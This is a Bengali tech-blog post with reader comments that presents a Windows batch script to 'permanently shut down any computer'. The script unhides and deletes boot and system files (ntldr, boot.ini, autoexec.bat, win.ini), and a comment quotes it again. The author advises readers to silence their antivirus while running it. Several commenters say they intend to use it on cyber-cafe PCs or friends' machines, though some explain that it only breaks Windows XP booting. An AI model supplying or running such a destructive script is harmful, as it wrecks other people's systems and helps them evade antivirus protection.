****চিরতরে বন্ধ করে দিন যে কোন কম্পিউটার (একটি বিতর্কিত টিউন )****

টিউন বিভাগ টিপস এন্ড ট্রিকস
প্রকাশিত
জোসস করেছেন

সবাইকে রমজানুল মুবারকের শুভেচ্ছা । আশা করি সকলে ভাল আছেন ।

দীর্ঘ এক মাস পর আবর আবার আপনাদের মাঝে একটি টিউন করলাম । চেয়েছলিামি একটি বড় টিউন করব । কিন্তু সারাদিন রোজা রাখার পর তা পারলামনা । তাই খুব ছোট একটি টউন করলাম । শিরনামটি পরে হয়ত বুঝতে পেরেছেন ব্যাপারটি কি হবে ।

প্রথমে একটি নোটপ্যাড ওপেন করে তাতে নিচের কোডটুকু কপি করে পেষ্ট করুন এবং .bat file নামে সেভ করুন । ব্যাস কাজ শেষ । এবার ফাইলটিতে ডাবল ক্লিক করলেই কম্পিউটারটি চিরদিনের জন্য বন্ধ হয়ে যাবে ।

--------------------------------------------------

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

------------------------------------------------------

সতর্কতা : ভুলেও কাজটি আপনার নিজের কম্পিউটারে করবেন না  এবং এটি দ্বারা কেউ ক্ষতিগ্রস্থ হলে আমি দায়ী থাকিব না ।

এখন আপনাদের মাঝে প্রশ্ন আসতে পারে টিউনটি করলাম কেন ?

উত্তর : সকল বিষয়ের উপর মানুষের ধারনা থাকা উচিত । হয়ত এমন একটি নোটপ্যাড কেউ আপনাকে মেইল করে পাঠাতে পারে । তাই অজানা কোন নোটপ্যাড কখনও ওপেন করবেন না ।

বি:দ্র: কাজটি করার সময় পিসির এন্টিভাইরাস সাইলেন্ট মুড করে নিবেন ।

মচ

সকলে ভাল থাকবেন .........................বাপ্পী পটুয়াখালী


Level 0

আমি বাপ্পী পটুয়াখালী। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 14 বছর 10 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 19 টি টিউন ও 136 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 1 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।

বিশ্বজোড়া পাঠশালা মোর সবার আমি ছাত্র,নানানভাবে নতুন জিনিস শিখছি দিবারাত্র এই পৃথিবীর বিরাট খাতায়,পাঠ্য যে সব পাতায় পাতায় শিখছি সেসব কৌতূহলে সন্দেহ নেই মাত্র


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

ভালো কাজে লাগবে। সাইবার ক্যাফের একটা পিসি দেখি বন্ধ হয় কি না। পরে আমার এক বন্ধুর টা হে। হে। হে। হে।খুক খুক………

বুঝলাম না,নিজেকে আরো বড়ো করে পাবলিশ করার আর কোন প্রন্হা কি পেলেন না।রোজা তো বুঝলেন কিন্তু এই রোজায় এত্ত বড় একটা ফাইল আপলোড না দিয়ে আরো ভালো কিছু দিতে পারতেন।আরে আমরাএ তো এই রোজার মাঝে কষ্ট করে টিউন পড়ছি।তাতে ভালো কিছু পড়তে পারতাম।আর আপনি কি তারাবি পড়েছেন?

    Level 0

    বোমা যেমন ধ্বংস করে তেমন এটা দিয়ে পাহাড় উড়িয়ে রাস্তাও তৈরী করা হত আগে

    ধন্যবাদ আপনাকে, ছবিটি আপলোড করতে এক মিনিট সময় লেগেছে । আর আমার বাংলা লেখার অভ্যাস কম । এই টিউনটি লিখতে 30 মিনিট সময় লেগেছে । হয়ত আপনাদের লাগত 5 মিনিট

    Level 0

    ভাইজান চিকন কেন???
    রোজা রাইখা……নাকি…

    শরীরের কি অবস্থা?

    Level 3

    অনেক ধন্যবাদ কাজে লাগার মতো জিনিষ। টিউনটা তো জটিল হইছে তবে নিচে ছবিটা কার? দেখে মনে হইতেছে গুরু আজম ভাই ডেলান দিয়া বইসা আছে। হা হা হা হা হা একটু মজা করলাম। খুব ভাল ছবি উঠছে।

বাপ্পি ভাই আপনি কি কোন এই কোড দিয়ে কোন কম্পিউটার চিরতরে বন্ধ করেছিলেন? আপনি করে থাকলে আমিও রিস্ক নিতে পারি।

    Level 0

    আমি কালকে একটা টাই মারব
    তারপর আপনাদের জানাব

    ভাই আমার 2টি ডেক্সটপ ও একটি ল্যাপটপ । এর মধ্যে একটি ডেক্সটপ পুরোন সকল পরীক্ষামূলক কাজ এটি দিয়ে করি । এই পরীক্ষাটিও পুরানটা দিয়ে করেছি । বর্তমানে আবার নতুন উইন্ডোজ দিয়ে চালু করেছি

Level 0

বাপ্পি ভাইকে পেন্ডিং একটা ধন্যবাদ
এটা ডেলিভারি করব কালকে সাকচেস হবার পর

    ধন্যবাদ LuckyFM ভাই , আমরা যারা টিউন করি সকলেই সকলের কাছে অপরিচিত । অথচ সবাই কেমন আপন । এক এক জন বাংলাদেশের এক এক প্রান্তে, কেউবা আবার দেশের বাইরে । তাই ছবিটি দিয়েছি । কিন্তু এটা যদি কেউ খারাপ চোখে দেখে তাহলে খুব কষ্ট লাগবে ।

    না না। আমার তো বেশ ভাল লেগেছে। বাপ্পি ভাইকে চিনে রাখলাম । হা হা

    Level 0

    @বাপ্পি ভাই আসলে এটা কাউর কাউর মন-মানসিকতার ব্যাপার, এই গুলা নিয়ে মাথা ঘামালে চলেনা

    @ দিহান ভাই উনার পোরট্রেইটই বেশি সুন্দর

Level 0

OS ও কি দেয়া যাবে না ???

এটা কোন প্রোসেসে একটা পিসি চিরতরে বন্ধ করে…..????
এটা কি শুধু পিসি’র ওএস নষ্ট করে….নাকি…. হার্ডওয়্যারের উপরেও প্রভাব ফেলে….???
এ ব্যাপারে বিস্তারিত জানতে চাই……

    আমার যতদূর মনে হয় এটা ওএস-এর উপরে প্রভাব ফেলবে…..

Level 2

apni jodi windows 7 ba windows vista use kore thaken tahole kisui hobe na……..
emonki apni jodi windows xp er service pack 3 o use kore thaken taholeo kisu hobe na……..
kisu hobe na bolte chirotore nosto hobe na……..

eta diye jeta hobe seta holo OS er ntldr file ta delete hoye jabe ba kono vabe sothik vabe kaj korbe na…….
ar ntldr file kono vabe jak na korle khub besi hole apni jodi apnar computer e kono game install kore thaken tahole segula ar kaj korbe na…….

ai vulnerabilities silo windows XP er akdom prothom version ba er ager version gula te….

মেঘ রোদ্দুর ভাই, আবার নতুন উইন্ডোজ সেটাপ দিয়ে চালু করতে হবে । এটা খুব শক্তিশালী একটা ভাইরাস কোড । নোটপ্যাডে ডাবল ক্লিক করার সাথে সাথে অপারেটিং সিষ্টেম নষ্ট করে দেয় । হার্ডওয়্যারের উপরে কোন প্রভাব ফেলে না ।

    Level 2

    koi tate try marsen ekhon porjunto………

    হুম….তবে আমাদের সাধের উবুন্টুর উপর কোন কাজ করে না…. 😀

আমি নিজে পরীক্ষা না করে কোন টিউন করিনা

    Level 2

    lol………..
    hasailen bappi vai……..
    kon OS e try korsen ar kon version e………
    assa bollen na to eta kivabe kaj kore ……….
    details aktu janaben………..

Level 0

বাপ্পী ভাই কি খবর কেমন আছেন? চোখ বন্ধ করলে এখনো আপনাদের শহরের সব স্মৃতি ফুটে ওঠে যা কোনদিন ভোলা যাবে না, ওফ্ কি দিনগুলিই না ছিল। এখনও খুব মিস করি পটুয়াখালীর মানুষকে । আমি আবার আসিব আপনাদের ওখানে অন্য কোন বেশে।…….যা হোক……….. আমার পিসি তো বন্ধ হয় না।

    Level 2

    lol M H Bulbul vai………..
    ami take ai kotha tai bojhate chaitesi eto somoi dhore………..
    bole valo kaj korsen…….

    ধন্যবাদ বুলবুল ভাই , হয়ত কোন সমস্যা আছে, কিন্তু আমার পুরাতন পিসিটায়ত কাজ করেছে । হয়তবা আপডেট পিসিতে হবেনা । আর পটুয়াখালীতে আসলে অবশ্যই দেখা করবেন ।

    রাজ ভাই বাংলা দেন। ইংলিশ ভাল লাগেনা

ভালো তবে আগে জানা ছিল। ওয়েলকাম ব্যাক।

মারাত্মক জিনিস আমি কোনদিনই ট্রাই করব না ।

সবার কাছে অনুরোধ
কারও এমন ক্ষতি করবেন না।

আমি তো ভেবেছিলাম নতুন ও এস দিলে ও ঠিক হবে না।

Code দেখে বোঝা যাচ্ছে এটি শুধু Windows XP এর বুটিংয়ের জন্য জরুরী কিছু ফাইল ডিলেট করবে । তাই XP অন হবে না । পুনরায় OS দিতে হবে ।

এমন কোন সফটওয়্যার বা কোড বানানো সম্ভব না যা দ্বারা কোন পিসি আর অন হবে না, তা যত পুরাতন পিসিই হোক না কেন ।

আশা করি বিস্তারিত জেনে পোষ্ট করবেন ।

বাপ্পি ভাই নষ্ট করার নিয়ম দিলেন ঠিক করার নিয়মটাও দেন

c ড্রাইভ থেকে boot.ini,autoexec,ntldr ফাইল গুলো ডিলেট করলেও কি কাজ হয়?
কয়েক দিন আগে কম্পিটারে সমস্যা হয়েছিল,বার বার রি-স্টার্ট নিত।
c ড্রাইভে গিয়া ঐ ফাইল গুলো দেখে ভাইরাস মনে কইরা মারলাম ডিলেট,মনে করছিলাম রিসাইকেল থেকে পরে নেওয়া যাবে।
কিন্তু তার সুযোগ পাইলাম না।xp ও নিচ্ছিল না।
বিভিন্ন ভাবে চেষ্টা কইরা xp দেওয়ার পর ঠিক হল।

গুরু আজম খানের COPY < PASTE

Level 0

বাপ্পী পটুয়াখালী ভাই,সংগ্রহে রাখলাম,আপনের শার্ট পড়া ছবি টা ভাল ,আপনের চোখের খবর কি ধন্যবাদ,,,,,,,,,,,,,,,।

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
কোড গুলো মানেটা একটু বুঝিয়ে বলেন।
del c:
বুঝলাম কিন্তু attron-r-s-h এর মানে কি?

    attrib -r-s-h মানে হল সে ফাইলটির read-only মোড,super hidden এবং hidden মোড আনসিলেক্ট করবে।কারণ এছাড়া delete হবে না

লাকি ভাই ও সবাইকে বলছি, ফটোশোপ ৭ এ বাংলা লিখার নিয়মটা বলবেন।

    Level 0

    যদি আপনি ফটোশোপ ৭ বাংলা লিখাতে না পরেন তাহলে Ms word দিয়ে লিখে Past করুন । তবে একটা কথা মনে রাখবেন ফটোশোপ ৭ font থেকে বাংলা সিলেক্ট করতে হবে।ধন্যবাদ

Level 0

এই সমস্ত টিউন ভালর চেয়ে খতি করে বেশী, তার পরেও সাবধান করার জন্য ধন্যবাদ।

আপ্নের ছবি ভাল লাগছে ! ছবিটা কে উঠাইছে?

ভাইয়ে তো দারুন স্বান্থ্য (!)
ধন্যবাদ টিউনের জন্য।

আপনার স্বাস্থ্য আমার স্বাস্থের কোন অংশে কম না……

ভাই আগে আপনি টেষ্ট করুন। পরে আমরা করব। আমার পিসি তো আপনার জন্য কাঁদছে।

ভাই টিউন না কি? ফ্যাশন শো…

আপনি যেটা মনে করেন

ধন্যবাদ ধন্যবাদ এবং ধন্যবাদ,এত দিন পর আবার টেকটিউন আমাদের মাঝে ফিরে আসার জন্য……………

ভাই সাবধান করার জন্য ধন্যবাদ। ভালো থাকবেন

Level 0

কার কম্পিউটার এর উপর ট্রাই করে তার উপকার করবো তা বুঝতে পারছি না।

vai aponake dekhte lokonath thakurer moto lage.

আমি আজকেই ১ জনের পিসি তে দেখব ।
উইন্ডোজ ৭ এ কি হবে ভাই।
???? দয়া করে জানান তারাতারি … অপেক্ষা করসি…